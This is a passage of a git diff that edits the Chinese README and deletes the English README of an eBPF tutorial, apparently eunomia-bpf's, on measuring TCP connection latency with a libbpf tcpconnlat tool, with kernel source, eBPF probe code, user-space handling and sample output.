if (tp->rx_opt.ts_recent_stamp && inet->inet_daddr != daddr) { + /* Reset inherited state */ + tp->rx_opt.ts_recent = 0; + tp->rx_opt.ts_recent_stamp = 0; + if (likely(!tp->repair)) + WRITE_ONCE(tp->write_seq, 0); + } + + inet->inet_dport = usin->sin_port; + sk_daddr_set(sk, daddr); + + inet_csk(sk)->icsk_ext_hdr_len = 0; + if (inet_opt) + inet_csk(sk)->icsk_ext_hdr_len = inet_opt->opt.optlen; + + tp->rx_opt.mss_clamp = TCP_MSS_DEFAULT; + + /* Socket identity is still unknown (sport may be zero). + * However we set state to SYN-SENT and not releasing socket + * lock select source port, enter ourselves into the hash tables and + * complete initialization after this. + */ + tcp_set_state(sk, TCP_SYN_SENT); + err = inet_hash_connect(tcp_death_row, sk); + if (err) + goto failure; + + sk_set_txhash(sk); + + rt = ip_route_newports(fl4, rt, orig_sport, orig_dport, + inet->inet_sport, inet->inet_dport, sk); + if (IS_ERR(rt)) { + err = PTR_ERR(rt); + rt = NULL; + goto failure; + } + /* OK, now commit destination to socket. */ + sk->sk_gso_type = SKB_GSO_TCPV4; + sk_setup_caps(sk, &rt->dst); + rt = NULL; + + if (likely(!tp->repair)) { + if (!tp->write_seq) + WRITE_ONCE(tp->write_seq, + secure_tcp_seq(inet->inet_saddr, + inet->inet_daddr, + inet->inet_sport, + usin->sin_port)); + tp->tsoffset = secure_tcp_ts_off(net, inet->inet_saddr, + inet->inet_daddr); + } + + inet->inet_id = get_random_u16(); + + if (tcp_fastopen_defer_connect(sk, &err)) + return err; + if (err) + goto failure; + + err = tcp_connect(sk); + + if (err) + goto failure; + + return 0; + +failure: + /* + * This unhashes the socket and releases the local port, + * if necessary. + */ + tcp_set_state(sk, TCP_CLOSE); + inet_bhash2_reset_saddr(sk); + ip_rt_put(rt); + sk->sk_route_caps = 0; + inet->inet_dport = 0; + return err; +} +EXPORT_SYMBOL(tcp_v4_connect); +``` + +参考链接: + +接下来,我们一步步分析这个函数: + +首先,这个函数接收三个参数:一个套接字指针`sk`,一个指向套接字地址结构的指针`uaddr`和地址的长度`addr_len`。 + +```c +int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len) +``` + +函数一开始就进行了参数检查,确认地址长度正确,而且地址的协议族必须是IPv4。不满足这些条件会导致函数返回错误。 + +接下来,函数获取目标地址,如果设置了源路由选项(这是一个高级的IP特性,通常不会被使用),那么它还会获取源路由的下一跳地址。 + +```c +nexthop = daddr = usin->sin_addr.s_addr; +inet_opt = rcu_dereference_protected(inet->inet_opt, + lockdep_sock_is_held(sk)); +if (inet_opt && inet_opt->opt.srr) { + if (!daddr) + return -EINVAL; + nexthop = inet_opt->opt.faddr; +} +``` + +然后,使用这些信息来寻找一个路由到目标地址的路由项。如果不能找到路由项或者路由项指向一个多播或广播地址,函数返回错误。 + +接下来,它更新了源地址,处理了一些TCP时间戳选项的状态,并设置了目标端口和地址。之后,它更新了一些其他的套接字和TCP选项,并设置了连接状态为`SYN-SENT`。 + +然后,这个函数使用`inet_hash_connect`函数尝试将套接字添加到已连接的套接字的散列表中。如果这步失败,它会恢复套接字的状态并返回错误。 + +如果前面的步骤都成功了,接着,使用新的源和目标端口来更新路由项。如果这步失败,它会清理资源并返回错误。 + +接下来,它提交目标信息到套接字,并为之后的分段偏移选择一个安全的随机值。 + +然后,函数尝试使用TCP Fast Open(TFO)进行连接,如果不能使用TFO或者TFO尝试失败,它会使用普通的TCP三次握手进行连接。 + +最后,如果上面的步骤都成功了,函数返回成功,否则,它会清理所有资源并返回错误。 + +总的来说,`tcp_v4_connect`函数是一个处理TCP连接请求的复杂函数,它处理了很多情况,包括参数检查、路由查找、源地址选择、源路由、TCP选项处理、TCP Fast Open,等等。它的主要目标是尽可能安全和有效地建立TCP连接。 + +### 内核态代码 + +```c +// SPDX-License-Identifier: GPL-2.0 +// Copyright (c) 2020 Wenbo Zhang +#include +#include +#include +#include +#include "tcpconnlat.h" + +#define AF_INET 2 +#define AF_INET6 10 + +const volatile __u64 targ_min_us = 0; +const volatile pid_t targ_tgid = 0; + +struct piddata { + char comm[TASK_COMM_LEN]; + u64 ts; + u32 tgid; +}; + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 4096); + __type(key, struct sock *); + __type(value, struct piddata); +} start SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); + __uint(key_size, sizeof(u32)); + __uint(value_size, sizeof(u32)); +} events SEC(".maps"); + +static int trace_connect(struct sock *sk) +{ + u32 tgid = bpf_get_current_pid_tgid() >> 32; + struct piddata piddata = {}; + + if (targ_tgid && targ_tgid != tgid) + return 0; + + bpf_get_current_comm(&piddata.comm, sizeof(piddata.comm)); + piddata.ts = bpf_ktime_get_ns(); + piddata.tgid = tgid; + bpf_map_update_elem(&start, &sk, &piddata, 0); + return 0; +} + +static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk) +{ + struct piddata *piddatap; + struct event event = {}; + s64 delta; + u64 ts; + + if (BPF_CORE_READ(sk, __sk_common.skc_state) != TCP_SYN_SENT) + return 0; + + piddatap = bpf_map_lookup_elem(&start, &sk); + if (!piddatap) + return 0; + + ts = bpf_ktime_get_ns(); + delta = (s64)(ts - piddatap->ts); + if (delta < 0) + goto cleanup; + + event.delta_us = delta / 1000U; + if (targ_min_us && event.delta_us < targ_min_us) + goto cleanup; + __builtin_memcpy(&event.comm, piddatap->comm, + sizeof(event.comm)); + event.ts_us = ts / 1000; + event.tgid = piddatap->tgid; + event.lport = BPF_CORE_READ(sk, __sk_common.skc_num); + event.dport = BPF_CORE_READ(sk, __sk_common.skc_dport); + event.af = BPF_CORE_READ(sk, __sk_common.skc_family); + if (event.af == AF_INET) { + event.saddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_rcv_saddr); + event.daddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_daddr); + } else { + BPF_CORE_READ_INTO(&event.saddr_v6, sk, + __sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32); + BPF_CORE_READ_INTO(&event.daddr_v6, sk, + __sk_common.skc_v6_daddr.in6_u.u6_addr32); + } + bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, + &event, sizeof(event)); + +cleanup: + bpf_map_delete_elem(&start, &sk); + return 0; +} + +SEC("kprobe/tcp_v4_connect") +int BPF_KPROBE(tcp_v4_connect, struct sock *sk) +{ + return trace_connect(sk); +} + +SEC("kprobe/tcp_v6_connect") +int BPF_KPROBE(tcp_v6_connect, struct sock *sk) +{ + return trace_connect(sk); +} + +SEC("kprobe/tcp_rcv_state_process") +int BPF_KPROBE(tcp_rcv_state_process, struct sock *sk) +{ + return handle_tcp_rcv_state_process(ctx, sk); +} + +SEC("fentry/tcp_v4_connect") +int BPF_PROG(fentry_tcp_v4_connect, struct sock *sk) +{ + return trace_connect(sk); +} + +SEC("fentry/tcp_v6_connect") +int BPF_PROG(fentry_tcp_v6_connect, struct sock *sk) +{ + return trace_connect(sk); +} + +SEC("fentry/tcp_rcv_state_process") +int BPF_PROG(fentry_tcp_rcv_state_process, struct sock *sk) +{ + return handle_tcp_rcv_state_process(ctx, sk); +} + +char LICENSE[] SEC("license") = "GPL"; +``` + +这个eBPF(Extended Berkeley Packet Filter)程序主要用来监控并收集TCP连接的建立时间,即从发起TCP连接请求(`connect`系统调用)到连接建立完成(SYN-ACK握手过程完成)的时间间隔。这对于监测网络延迟、服务性能分析等方面非常有用。 + +首先,定义了两个eBPF maps:`start`和`events`。`start`是一个哈希表,用于存储发起连接请求的进程信息和时间戳,而`events`是一个`PERF_EVENT_ARRAY`类型的map,用于将事件数据传输到用户态。 + +```c +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 4096); + __type(key, struct sock *); + __type(value, struct piddata); +} start SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); + __uint(key_size, sizeof(u32)); + __uint(value_size, sizeof(u32)); +} events SEC(".maps"); +``` + +在`tcp_v4_connect`和`tcp_v6_connect`的kprobe处理函数`trace_connect`中,会记录下发起连接请求的进程信息(进程名、进程ID和当前时间戳),并以socket结构作为key,存储到`start`这个map中。 + +```c +static int trace_connect(struct sock *sk) +{ + u32 tgid = bpf_get_current_pid_tgid() >> 32; + struct piddata piddata = {}; + + if (targ_tgid && targ_tgid != tgid) + return 0; + + bpf_get_current_comm(&piddata.comm, sizeof(piddata.comm)); + piddata.ts = bpf_ktime_get_ns(); + piddata.tgid = tgid; + bpf_map_update_elem(&start, &sk, &piddata, 0); + return 0; +} +``` + +当TCP状态机处理到SYN-ACK包,即连接建立的时候,会触发`tcp_rcv_state_process`的kprobe处理函数`handle_tcp_rcv_state_process`。在这个函数中,首先检查socket的状态是否为`SYN-SENT`,如果是,会从`start`这个map中查找socket对应的进程信息。然后计算出从发起连接到现在的时间间隔,将该时间间隔,进程信息,以及TCP连接的详细信息(源端口,目标端口,源IP,目标IP等)作为event,通过`bpf_perf_event_output`函数发送到用户态。 + +```c +static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk) +{ + struct piddata *piddatap; + struct event event = {}; + s64 delta; + u64 ts; + + if (BPF_CORE_READ(sk, __sk_common.skc_state) != TCP_SYN_SENT) + return 0; + + piddatap = bpf_map_lookup_elem(&start, &sk); + if (!piddatap) + return 0; + + ts = bpf_ktime_get_ns(); + delta = (s64)(ts - piddatap->ts); + if (delta < 0) + goto cleanup; + + event.delta_us = delta / 1000U; + if (targ_min_us && event.delta_us < targ_min_us) + goto + + cleanup; + __builtin_memcpy(&event.comm, piddatap->comm, + sizeof(event.comm)); + event.ts_us = ts / 1000; + event.tgid = piddatap->tgid; + event.lport = BPF_CORE_READ(sk, __sk_common.skc_num); + event.dport = BPF_CORE_READ(sk, __sk_common.skc_dport); + event.af = BPF_CORE_READ(sk, __sk_common.skc_family); + if (event.af == AF_INET) { + event.saddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_rcv_saddr); + event.daddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_daddr); + } else { + BPF_CORE_READ_INTO(&event.saddr_v6, sk, + __sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32); + BPF_CORE_READ_INTO(&event.daddr_v6, sk, + __sk_common.skc_v6_daddr.in6_u.u6_addr32); + } + bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, + &event, sizeof(event)); + +cleanup: + bpf_map_delete_elem(&start, &sk); + return 0; +} +``` + +理解这个程序的关键在于理解Linux内核的网络栈处理流程,以及eBPF程序的运行模式。Linux内核网络栈对TCP连接建立的处理过程是,首先调用`tcp_v4_connect`或`tcp_v6_connect`函数(根据IP版本不同)发起TCP连接,然后在收到SYN-ACK包时,通过`tcp_rcv_state_process`函数来处理。eBPF程序通过在这两个关键函数上设置kprobe,可以在关键时刻得到通知并执行相应的处理代码。 + +一些关键概念说明: + +- kprobe:Kernel Probe,是Linux内核中用于动态追踪内核行为的机制。可以在内核函数的入口和退出处设置断点,当断点被触发时,会执行与kprobe关联的eBPF程序。 +- map:是eBPF程序中的一种数据结构,用于在内核态和用户态之间共享数据。 +- socket:在Linux网络编程中,socket是一个抽象概念,表示一个网络连接的端点。内核中的`struct sock`结构就是对socket的实现。 + +### 用户态数据处理 + +用户态数据处理是使用`perf_buffer__poll`来接收并处理从内核发送到用户态的eBPF事件。`perf_buffer__poll`是libbpf库提供的一个便捷函数,用于轮询perf event buffer并处理接收到的数据。 + +首先,让我们详细看一下主轮询循环: + +```c + /* main: poll */ + while (!exiting) { + err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS); + if (err < 0 && err != -EINTR) { + fprintf(stderr, "error polling perf buffer: %s\n", strerror(-err)); + goto cleanup; + } + /* reset err to return 0 if exiting */ + err = 0; + } +``` + +这段代码使用一个while循环来反复轮询perf event buffer。如果轮询出错(例如由于信号中断),会打印出错误消息。这个轮询过程会一直持续,直到收到一个退出标志`exiting`。 + +接下来,让我们来看看`handle_event`函数,这个函数将处理从内核发送到用户态的每一个eBPF事件: + +```c +void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) { + const struct event* e = data; + char src[INET6_ADDRSTRLEN]; + char dst[INET6_ADDRSTRLEN]; + union { + struct in_addr x4; + struct in6_addr x6; + } s, d; + static __u64 start_ts; + + if (env.timestamp) { + if (start_ts == 0) + start_ts = e->ts_us; + printf("%-9.3f ", (e->ts_us - start_ts) / 1000000.0); + } + if (e->af == AF_INET) { + s.x4.s_addr = e->saddr_v4; + d.x4.s_addr = e->daddr_v4; + } else if (e->af == AF_INET6) { + memcpy(&s.x6.s6_addr, e->saddr_v6, sizeof(s.x6.s6_addr)); + memcpy(&d.x6.s6_addr, e->daddr_v6, sizeof(d.x6.s6_addr)); + } else { + fprintf(stderr, "broken event: event->af=%d", e->af); + return; + } + + if (env.lport) { + printf("%-6d %-12.12s %-2d %-16s %-6d %-16s %-5d %.2f\n", e->tgid, + e->comm, e->af == AF_INET ? 4 : 6, + inet_ntop(e->af, &s, src, sizeof(src)), e->lport, + inet_ntop(e->af, &d, dst, sizeof(dst)), ntohs(e->dport), + e->delta_us / 1000.0); + } else { + printf("%-6d %-12.12s %-2d %-16s %-16s %-5d %.2f\n", e->tgid, e->comm, + e->af == AF_INET ? 4 : 6, inet_ntop(e->af, &s, src, sizeof(src)), + inet_ntop(e->af, &d, dst, sizeof(dst)), ntohs(e->dport), + e->delta_us / 1000.0); + } +} +``` + +`handle_event`函数的参数包括了CPU编号、指向数据的指针以及数据的大小。数据是一个`event`结构体,包含了之前在内核态计算得到的TCP连接的信息。 + +首先,它将接收到的事件的时间戳和起始时间戳(如果存在)进行对比,计算出事件的相对时间,并打印出来。接着,根据IP地址的类型(IPv4或IPv6),将源地址和目标地址从网络字节序转换为主机字节序。 + +最后,根据用户是否选择了显示本地端口,将进程ID、进程名称、IP版本、源IP地址、本地端口(如果有)、目标IP地址、目标端口以及连接建立时间打印出来。这个连接建立时间是我们在内核态eBPF程序中计算并发送到用户态的。 + +## 编译运行 + +```console +$ make +... + BPF .output/tcpconnlat.bpf.o + GEN-SKEL .output/tcpconnlat.skel.h + CC .output/tcpconnlat.o + BINARY tcpconnlat +$ sudo ./tcpconnlat +PID COMM IP SADDR DADDR DPORT LAT(ms) +222564 wget 4 192.168.88.15 110.242.68.3 80 25.29 +222684 wget 4 192.168.88.15 167.179.101.42 443 246.76 +222726 ssh 4 192.168.88.15 167.179.101.42 22 241.17 +222774 ssh 4 192.168.88.15 1.15.149.151 22 25.31 +``` + +源代码: 关于如何安装依赖,请参考: + +参考资料: + +- [tcpconnlat](https://github.com/iovisor/bcc/blob/master/libbpf-tools/tcpconnlat.c) + +## 总结 + +通过本篇 eBPF 入门实践教程,我们学习了如何使用 eBPF 来跟踪和统计 TCP 连接建立的延时。我们首先深入探讨了 eBPF 程序如何在内核态监听特定的内核函数,然后通过捕获这些函数的调用,从而得到连接建立的起始时间和结束时间,计算出延时。 + +我们还进一步了解了如何使用 BPF maps 来在内核态存储和查询数据,从而在 eBPF 程序的多个部分之间共享数据。同时,我们也探讨了如何使用 perf events 来将数据从内核态发送到用户态,以便进一步处理和展示。 + +在用户态,我们介绍了如何使用 libbpf 库的 API,例如 perf_buffer__poll,来接收和处理内核态发送过来的数据。我们还讲解了如何对这些数据进行解析和打印,使得它们能以人类可读的形式显示出来。 + +如果您希望学习更多关于 eBPF 的知识和实践,请查阅 eunomia-bpf 的官方文档: 。您还可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/13-tcpconnlat/README_en.md b/src/13-tcpconnlat/README_en.md deleted file mode 100644 index 491199b..0000000 --- a/src/13-tcpconnlat/README_en.md +++ /dev/null @@ -1,571 +0,0 @@ -# eBPF Tutorial by Example 13: Statistics of TCP Connection Delay with libbpf - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or changing the kernel source code. - -This article is the thirteenth installment of the eBPF Tutorial by Example, mainly about how to use eBPF to statistics TCP connection delay and process data in user space using libbpf. - -## Background - -When developing backends, regardless of the programming language used, we often need to call databases such as MySQL and Redis, perform RPC remote calls, or call other RESTful APIs. The underlying implementation of these calls is usually based on the TCP protocol. This is because TCP protocol has advantages such as reliable connection, error retransmission, congestion control, etc., so TCP is more widely used in network transport layer protocols than UDP. However, TCP also has some drawbacks, such as longer connection establishment delay. Therefore, some alternative solutions have emerged, such as QUIC (Quick UDP Internet Connections). - -Analyzing TCP connection delay is very useful for network performance analysis, optimization, and troubleshooting. - -## Overview of tcpconnlat Tool - -The `tcpconnlat` tool can trace the functions in the kernel that perform active TCP connections (such as using the `connect()` system call), measure and display connection delay, i.e., the time from sending SYN to receiving response packets. - -### TCP Connection Principle - -The process of establishing a TCP connection is often referred to as the "three-way handshake". Here are the steps of the entire process: - -1. Client sends SYN packet to the server: The client sends SYN through the `connect()` system call. This involves local system call and CPU time cost of software interrupts. -2. SYN packet is transmitted to the server: This is a network transmission that depends on network latency. -3. Server handles the SYN packet: The server kernel receives the packet through a software interrupt, then puts it into the listen queue and sends SYN/ACK response. This mainly involves CPU time cost. -4. SYN/ACK packet is transmitted to the client: This is another network transmission. -5. Client handles the SYN/ACK: The client kernel receives and handles the SYN/ACK packet, then sends ACK. This mainly involves software interrupt handling cost. -6. ACK packet is transmitted to the server: This is the third network transmission. -7. Server receives ACK: The server kernel receives and handles the ACK, then moves the corresponding connection from the listen queue to the established queue. This involves CPU time cost of a software interrupt. -8. Wake up the server-side user process: The user process blocked by the `accept()` system call is awakened, and then the established connection is taken out from the established queue. This involves CPU cost of a context switch. - -The complete flowchart is shown below: - -![tcpconnlat1](tcpconnlat1.png) - -From the client's perspective, under normal circumstances, the total time for a TCP connection is approximately the time consumed by one network round-trip. However, in some cases, it may cause an increase in network transmission time, an increase in CPU processing overhead, or even connection failure. When a long delay is detected, it can be analyzed in conjunction with other information. - -## eBPF Implementation of tcpconnlat - -To understand the process of establishing a TCP connection, we need to understand two queues used by the Linux kernel when handling TCP connections: - -- Listen queue (SYN queue): Stores TCP connections that are in the process of performing three-way handshake. After the server receives the SYN packet, it stores the connection information in this queue. -- Established queue (Accept queue): Stores TCP connections that have completed three-way handshake and are waiting for the application to call the `accept()` function. After the server receives the ACK packet, it creates a new connection and adds it to this queue. - -With an understanding of the purpose of these two queues, we can begin to explore the specific implementation of tcpconnlat. The implementation of tcpconnlat can be divided into two parts: kernel space and user space, which include several main trace points: `tcp_v4_connect`, `tcp_v6_connect`, and `tcp_rcv_state_process`. - -These trace points are mainly located in the TCP/IP network stack in the kernel. When executing the corresponding system call or kernel function, these trace points are activated, triggering the execution of eBPF programs. This allows us to capture and measure the entire process of establishing a TCP connection. - -Let's take a look at the source code of these mounting points first: - -```c -SEC("kprobe/tcp_v4_connect") -int BPF_KPROBE(tcp_v4_connect, struct sock *sk) -{ - return trace_connect(sk); -} - -SEC("kprobe/tcp_v6_connect") -int BPF_KPROBE(tcp_v6_connect, struct sock *sk) -{ - return trace_connect(sk); -} - -SEC("kprobe/tcp_rcv_state_process") -int BPF_KPROBE(tcp_rcv_state_process, struct sock *sk) -{ - return handle_tcp_rcv_state_process(ctx, sk); -} -``` - -This code snippet shows the definition of three kernel probes (kprobe). `tcp_v4_connect` and `tcp_v6_connect` are triggered when the corresponding IPv4 and IPv6 connections are initialized, invoking the `trace_connect()` function. On the other hand, `tcp_rcv_state_process` is triggered when the TCP connection state changes in the kernel, calling the `handle_tcp_rcv_state_process()` function. - -The following section will be divided into two parts: one part analyzes the kernel part of these mount points, where we will delve into the kernel source code to explain how these functions work in detail. The other part analyzes the user part, focusing on how eBPF programs collect data from these mount points and interact with user-space programs. - -### Analysis of tcp_v4_connect function - -The `tcp_v4_connect` function is the main way that the Linux kernel handles TCP IPv4 connection requests. When a user-space program creates a socket through the `socket` system call and then attempts to connect to a remote server through the `connect` system call, the `tcp_v4_connect` function is triggered. - -```c -/* This will initiate an outgoing connection. */ -int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len) -{ - struct sockaddr_in *usin = (struct sockaddr_in *)uaddr; - struct inet_timewait_death_row *tcp_death_row; - struct inet_sock *inet = inet_sk(sk); - struct tcp_sock *tp = tcp_sk(sk); - struct ip_options_rcu *inet_opt; - struct net *net = sock_net(sk); - __be16 orig_sport, orig_dport; - __be32 daddr, nexthop; - struct flowi4 *fl4; - struct rtable *rt; - int err; - - if (addr_len < sizeof(struct sockaddr_in)) - return -EINVAL; - - if (usin->sin_family != AF_INET) - return -EAFNOSUPPORT; - - nexthop = daddr = usin->sin_addr.s_addr; - inet_opt = rcu_dereference_protected(inet->inet_opt, - lockdep_sock_is_held(sk)); - if (inet_opt && inet_opt->opt.srr) { - if (!daddr) - return -EINVAL; - nexthop = inet_opt->opt.faddr; - } - - orig_sport = inet->inet_sport; - orig_dport = usin->sin_port; - fl4 = &inet->cork.fl.u.ip4; - rt = ip_route_connect(fl4, nexthop, inet->inet_saddr, - sk->sk_bound_dev_if, IPPROTO_TCP, orig_sport, - orig_dport, sk); - if (IS_ERR(rt)) { - err = PTR_ERR(rt); - if (err == -ENETUNREACH) - IP_INC_STATS(net, IPSTATS_MIB_OUTNOROUTES); - return err; - } - - if (rt->rt_flags & (RTCF_MULTICAST | RTCF_BROADCAST)) { - ip_rt_put(rt); - return -ENETUNREACH; - } - if (!inet_opt || !inet_opt->opt.srr) - daddr = fl4->daddr; - - tcp_death_row = &sock_net(sk)->ipv4.tcp_death_row; - - if (!inet->inet_saddr) { - err = inet_bhash2_update_saddr(sk, &fl4->saddr, AF_INET); - if (err) { - ip_rt_put(rt); - return err; - } - } else { - sk_rcv_saddr_set(sk, inet->inet_saddr); - } - - if (tp->rx_opt.ts_recent_stamp && inet->inet_daddr != daddr) { - /* Reset inherited state */ - tp->rx_opt.ts_recent = 0; - tp->rx_opt.ts_recent_stamp = 0; - if (likely(!tp->repair)) - WRITE_ONCE(tp->write_seq, 0); - } - - inet->inet_dport = usin->sin_port; - sk_daddr_set(sk, daddr); - - inet_csk(sk)->icsk_ext_hdr_len = 0; - if (inet_opt) - inet_csk(sk)->icsk_ext_hdr_len = inet_opt->opt.optlen; - - tp->rx_opt.mss_clamp = TCP_MSS_DEFAULT; - - /* Socket identity is still unknown (sport may be zero). - * However we set state to SYN-SENT and not releasing socket - * lock select source port, enter ourselves into the hash tables and - * complete initialization after this. - */ - tcp_set_state(sk, TCP_SYN_SENT); - err = inet_hash_connect(tcp_death_row, sk); - if (err) - goto failure; - - sk_set_txhash(sk); - - rt = ip_route_newports(fl4, rt, orig_sport, orig_dport, - inet->inet_sport, inet->inet_dport, sk); - if (IS_ERR(rt)) { - err = PTR_ERR(rt); - rt = NULL; - goto failure; - } - /* OK, now commit destination to socket. */ - sk->sk_gso_type = SKB_GSO_TCPV4; - sk_setup_caps(sk, &rt->dst); - rt = NULL; - - if (likely(!tp->repair)) { - if (!tp->write_seq) - WRITE_ONCE(tp->write_seq, - secure_tcp_seq(inet->inet_saddr, - inet->inet_daddr, - inet->inet_sport, - usin->sin_port)); - tp->tsoffset = secure_tcp_ts_off(net, inet->inet_saddr, - inet->inet_daddr); - } - - inet->inet_id = get_random_u16(); - - if (tcp_fastopen_defer_connect(sk, &err)) - return err; - if (err) - goto failure; - - err = tcp_connect(sk); - - if (err) - goto failure; - - return 0; - -failure: - /*".* This unhashes the socket and releases the local port, - * if necessary. - */ - tcp_set_state(sk, TCP_CLOSE); - inet_bhash2_reset_saddr(sk); - ip_rt_put(rt); - sk->sk_route_caps = 0; - inet->inet_dport = 0; - return err; -} -EXPORT_SYMBOL(tcp_v4_connect); -``` - -Reference link: - -Next, let's analyze this function step by step: - -First, this function takes three parameters: a socket pointer `sk`, a pointer to the socket address structure `uaddr`, and the length of the address `addr_len`. - -```c -int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len) -``` - -The function starts by checking the parameters, making sure the address length is correct and the address family is IPv4. If these conditions are not met, the function returns an error. - -Next, the function retrieves the destination address and, if a source routing option is set (an advanced IP feature that is typically not used), it also retrieves the next hop address for the source route. - -```c -nexthop = daddr = usin->sin_addr.s_addr; -inet_opt = rcu_dereference_protected(inet->inet_opt, - lockdep_sock_is_held(sk)); -if (inet_opt && inet_opt->opt.srr) { - if (!daddr) - return -EINVAL; - nexthop = inet_opt->opt.faddr; -} -``` - -Then, using this information, the function looks for a route entry to the destination address. If a route entry cannot be found or the route entry points to a multicast or broadcast address, the function returns an error. - -Next, it updates the source address, handles the state of some TCP timestamp options, and sets the destination port and address. After that, it updates some other socket and TCP options and sets the connection state to `SYN-SENT`. - -Then, the function tries to add the socket to the connected sockets hash table using the `inet_hash_connect` function. If this step fails, it restores the socket state and returns an error. - -If all the previous steps succeed, it then updates the route entry with the new source and destination ports. If this step fails, it cleans up resources and returns an error. - -Next, it commits the destination information to the socket and selects a secure random value for the sequence offset for future segments. - -Then, the function tries to establish the connection using TCP Fast Open (TFO), and if TFO is not available or the TFO attempt fails, it falls back to the regular TCP three-way handshake for connection. - -Finally, if all the above steps succeed, the function returns success; otherwise, it cleans up all resources and returns an error. - -In summary, the `tcp_v4_connect` function is a complex function that handles TCP connection requests. It handles many cases, including parameter checking, route lookup, source address selection, source routing, TCP option handling, TCP Fast Open, and more. Its main goal is to establish TCP connections as safely and efficiently as possible. - -### Kernel Code - -```c -// SPDX-License-Identifier: GPL-2.0 -// Copyright (c) 2020 Wenbo Zhang -#include -#include -#include -#include -#include "tcpconnlat.h" - -#define AF_INET 2 -#define AF_INET6 10 - -const volatile __u64 targ_min_us = 0; -const volatile pid_t targ_tgid = 0; - -struct piddata { - char comm[TASK_COMM_LEN]; - u64 ts; - u32 tgid; -}; - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 4096); - __type(key, struct sock *); - __type(value, struct piddata); -} start SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); - __uint(key_size, sizeof(u32)); - __uint(value_size, sizeof(u32)); -} events SEC(".maps"); - -static int trace_connect(struct sock *sk) -{ - u32 tgid = bpf_get_current_pid_tgid() >> 32; - struct piddata piddata = {}; - - if (targ_tgid && targ_tgid != tgid) - return 0; - - bpf_get_current_comm(&piddata.comm, sizeof(piddata.comm)); - piddata.ts = bpf_ktime_get_ns(); - piddata.tgid = tgid; - bpf_map_update_elem(&start, &sk, &piddata, 0); - return 0; -} - -static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk) -{ - struct piddata *piddatap; - struct event event = {}; - s64 delta; - u64 ts; - - if (BPF_CORE_READ(sk, __sk_common.skc_state) != TCP_SYN_SENT) - return 0; - - piddatap = bpf_map_lookup_elem(&start, &sk); - if (!piddatap) - return 0; - - ts = bpf_ktime_get_ns(); - delta = (s64)(ts - piddatap->ts); - if (delta < 0) - goto cleanup; - - event.delta_us = delta / 1000U; - if (targ_min_us && event.delta_us < targ_min_us) - goto cleanup; - __builtin_memcpy(&event.comm, piddatap->comm, - sizeof(event.comm)); - event.ts_us = ts / 1000; - event.tgid = piddatap->tgid; - event.lport = BPF_CORE_READ(sk, __sk_common.skc_num); - event.dport = BPF_CORE_READ(sk, __sk_common.skc_dport); - event.af = BPF_CORE_READ(sk, __sk_common.skc_family); - if (event.af == AF_INET) { - event.saddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_rcv_saddr); - event.daddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_daddr); - } else { - BPF_CORE_READ_INTO(&event.saddr_v6, sk, - __sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32); - BPF_CORE_READ_INTO(&event.daddr_v6, sk, - __sk_common.skc_v6_daddr.in6_u.u6_addr32); - } - bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, - &event, sizeof(event)); - -cleanup: - bpf_map_delete_elem(&start, &sk); - return 0; -} - -SEC("kprobe/tcp_v4_connect") -int BPF_KPROBE(tcp_v4_connect, struct sock *sk) -{ - return trace_connect(sk); -} - -SEC("kprobe/tcp_v6_connect") -int BPF_KPROBE(tcp_v6_connect, struct sock *sk) -{ - return trace_connect(sk); -} - -SEC("kprobe/tcp_rcv_state_process") -int BPF_KPROBE(tcp_rcv_state_process, struct sock *sk) -{ - return handle_tcp_rcv_state_process(ctx, sk); -} - -SEC("fentry/tcp_v4_connect") -int BPF_PROG(fentry_tcp_v4_connect, struct sock *sk) -{ - return trace_connect(sk); -} - -SEC("fentry/tcp_v6_connect") -int BPF_PROG(fentry_tcp_v6_connect, struct sock *sk) -{ - return trace_connect(sk); -} - -SEC("fentry/tcp_rcv_state_process") -int BPF_PROG(fentry_tcp_rcv_state_process, struct sock *sk) -{ - return handle_tcp_rcv_state_process(ctx, sk); -} - -char LICENSE[] SEC("license") = "GPL"; -``` - -This eBPF (Extended Berkeley Packet Filter) program is mainly used to monitor and collect the time it takes to establish TCP connections, i.e., the time interval from initiating a TCP connection request (connect system call) to the completion of the connection establishment (SYN-ACK handshake process). This is very useful for monitoring network latency, service performance analysis, and other aspects. - -First, two eBPF maps are defined: `start` and `events`. `start` is a hash table used to store the process information and timestamp of the initiating connection request, while `events` is a map of type `PERF_EVENT_ARRAY` used to transfer event data to user space. - -```c -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 4096); - __type(key, struct sock *); - __type(value, struct piddata); -} start SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); - __uint(key_size, sizeof(u32)); - __uint(value_size, sizeof(u32)); -} events SEC(".maps"); -``` - -In the kprobe handling functions `trace_connect` of `tcp_v4_connect` and 